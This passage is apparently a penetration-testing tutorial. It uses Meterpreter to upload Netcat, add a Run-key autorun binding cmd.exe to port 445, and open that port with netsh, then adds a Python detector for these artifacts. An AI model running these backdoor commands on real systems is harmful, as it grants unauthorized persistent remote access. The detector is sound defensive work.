In this example, instead of looking up information on the remote system, we will be installing a Netcat backdoor. This includes changes to the system registry and firewall.

First, we must upload a copy of Netcat to the remote system.

```
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
uploading : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
uploaded : /usr/share/windows-binaries/nc.exe -> C:\windows\system32nc.exe
```

Afterwards, we work with the registry to have netcat execute on start up and listen on port 445. We do this by editing the key ‘HKLM\software\microsoft\windows\currentversion\run’.

```
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe
```

Next, we need to alter the system to allow remote connections through the firewall to our Netcat backdoor. We open up an interactive command prompt and use the netsh command to make the changes as it is far less error-prone than altering the registry directly. Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent.

```
meterpreter > execute -f cmd -i
C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode
Standard profile configuration (current):
Local Area Connection firewall configuration:
```

We open up port 445 in the firewall and double-check that it was set properly.

```
C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
C:\Documents and Settings\Jim\My Documents >
C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening
```

So with that being completed, we will reboot the remote system and test out the Netcat shell.
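From the defender's side, this procedure leaves two artifacts: an autorun value that starts a listener with `-e`, and a `netsh firewall add portopening` command for the same port. The following is an added example, not code from the original page, that flags both and correlates them; the function names and the sample records are constructed assumptions.

```python
import re
import shlex

# A listen flag, alone or combined with other flags as in "-Ldp".
LISTEN_FLAG = re.compile(r"^-[a-zA-Z]*[lL][a-zA-Z]*$")
# Legacy netsh syntax that opens an inbound port.
PORTOPENING = re.compile(
    r"netsh(?:\.exe)?\s+firewall\s+add\s+portopening\s+(TCP|UDP|ALL)\s+(\d+)", re.I)

# Constructed sample data: autorun (Run key) values and process command lines.
SAMPLE_RUN = {
    "VendorUpdater": r'"C:\Program Files\Vendor\updater.exe" /background',
    "nc": r"C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe",
}
SAMPLE_CMDS = [
    "netsh firewall show opmode",
    'netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL',
]


def audit_run_value(name, data):
    """Return a finding if an autorun value starts a listener bound to a program."""
    tokens = shlex.split(data, posix=False)  # posix=False keeps Windows backslashes
    args = tokens[1:]
    has_listen = any(LISTEN_FLAG.match(t) for t in args)
    exec_target = next(
        (args[i + 1] for i, t in enumerate(args[:-1]) if t == "-e"), None)
    if not (has_listen and exec_target):
        return None
    port = next((int(t) for t in args if t.isdigit()), None)
    return {"value": name, "image": tokens[0], "port": port, "exec": exec_target}


def audit_command_lines(lines):
    """Return (protocol, port) for every 'add portopening' command seen."""
    return [(m.group(1).upper(), int(m.group(2)))
            for line in lines if (m := PORTOPENING.search(line))]


def correlate(run_values, command_lines):
    """Listener autoruns, marked when their port was also opened in the firewall."""
    opened = {port for _, port in audit_command_lines(command_lines)}
    findings = [audit_run_value(n, d) for n, d in run_values.items()]
    findings = [f for f in findings if f]
    for f in findings:
        f["firewall_opened"] = f["port"] in opened
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_RUN, SAMPLE_CMDS):
        print(finding)
```

A finding with `firewall_opened` set is the higher-confidence signal, since a legitimate autorun rarely pairs a listener flag, `-e`, and a matching firewall exception.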